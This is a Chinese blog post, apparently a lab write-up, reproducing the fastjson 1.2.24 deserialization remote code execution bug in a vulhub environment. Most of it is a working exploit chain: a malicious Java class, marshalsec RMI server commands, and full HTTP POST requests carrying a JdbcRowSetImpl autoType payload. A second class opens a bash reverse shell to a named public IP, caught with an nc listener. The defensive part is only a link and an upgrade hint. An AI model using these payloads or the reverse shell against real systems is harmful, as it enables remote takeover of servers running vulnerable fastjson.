fastjson漏洞复现

2021-07-21 15:55

阅读:600

标签:docker   visit   mozilla   static   control   利用   rmi   持久化   loading   

简介

漏洞环境:不另作说明均为vulhub

菜鸟链接:https://www.runoob.com/w3cnote/fastjson-intro.html

GitHub:https://github.com/alibaba/fastjson

fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。

关于漏洞原理,这篇文章讲的挺好的:https://zhuanlan.zhihu.com/p/157211675?from_voters_page=true,复现时参考的文章也很不错。

1.2.24-rce

参考链接:

https://blog.csdn.net/qq_44159028/article/details/112393935

https://github.com/vulhub/vulhub/blob/master/fastjson/1.2.24-rce/README.md

https://blog.csdn.net/w1590191166/article/details/105016535

https://www.freebuf.com/articles/web/258253.html

影响版本:

  • fastjson

fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。在Java 8u102环境下,没有com.sun.jndi.rmi.object.trustURLCodebase的限制,可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。

漏洞复现

使用vulhub开启环境,成功后会开启8090端口,访问后结果如下说明搭建成功。

技术图片

在Linux系统下通过如下命令,发送一个JSON对象,更新服务端的信息。

curl http://139.198.172.202:8090/ -H "Content-Type: application/json" --data ‘{"name":"xzc", "age":23}‘

技术图片

不要使用Windows系统下自带的curl命令,因为会报错,我记得之前也遇到过。

技术图片

将下面代码内容(恶意类)保存为TouchFile.java文件(名字不能乱改)。

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

编译生成.class文件。

javac TouchFile.java

技术图片

将生成的.class文件放置到云主机中,使用python3 -m http.server 9999命令,启动一个http服务。

然后需要借助marshalsec项目,启动一个RMI服务器,用来指定加载远程类。

项目地址:https://github.com/mbechler/marshalsec

最终我们要是用的是其生成的marshalsec-0.0.3-SNAPSHOT-all.jar,自己生成略微麻烦,网上有现成的:https://github.com/zhzyker/exphub/blob/master/fastjson/marshalsec-0.0.3-SNAPSHOT-all.jar

接下来使用marshalsec-0.0.3-SNAPSHOT-all.jar来起一个RMI服务,监听6666端口。

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://139.198.172.202:9999/#TouchFile" 6666

技术图片

访问靶机地址,拦截抓包,将GET请求改为POST请求,提交攻击payload。

POST / HTTP/1.1
Host: 139.198.172.202:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ECS[visit_times]=4; pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; pma_iv-1=oGblD1Xgl1ZFrVI58W88SA%3D%3D; pmaUser-1=XlLtmUCDz5gzl%2FNz%2Fe7h1w%3D%3D
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 165

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://139.198.172.202:6666/TouchFile",
        "autoCommit":true
    }
}

点击发送,服务器响应如下:

技术图片

通过docker ps命令查看启动的容器id,通过docker exec -it 容器id /bin/bash进入容器。到/tmp目录下查看success文件是否被创建。

技术图片

http服务以及RMI服务的请求内容如下:

技术图片

技术图片

其中,如果你的云主机的java版本较高,启动的RMI服务会有warning情况(可能会导致实验不成功),我的云主机java版本为jdk1.8.0_291

技术图片

反弹shell:

  1. 生成恶意类
// javac shell.java
import java.lang.Runtime;
import java.lang.Process;

public class shell {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/139.198.172.202/7777 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

通过javac命令进行编译,生成shell.class

  1. 将生成的shell.class文件放置在http服务目录下,端口9999

  2. 启用RMI服务。

    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://139.198.172.202:9999/#shell" 6666
    

    #后面内容需要修改。

  3. 云主机监听7777端口,nc -lvp 7777

  4. 发送请求包内容:

    POST / HTTP/1.1
    Host: 139.198.172.202:8090
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: ECS[visit_times]=4; pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; pma_iv-1=oGblD1Xgl1ZFrVI58W88SA%3D%3D; pmaUser-1=XlLtmUCDz5gzl%2FNz%2Fe7h1w%3D%3D
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0
    Content-Type: application/json
    Content-Length: 163
    
    {
        "b":{
            "@type":"com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName":"rmi://139.198.172.202:6666/shell",
            "autoCommit":true
        }
    } 	
    
  5. 云主机接收到反弹的shell:

    技术图片

漏洞修复

参考链接:

https://www.freebuf.com/vuls/178012.html

还有就是升级版本咯。

1.2.47-rce

vuln

fastjson漏洞复现

标签:docker   visit   mozilla   static   control   利用   rmi   持久化   loading   

原文地址:https://www.cnblogs.com/ahtoh/p/14991631.html


评论


亲,登录后才可以留言!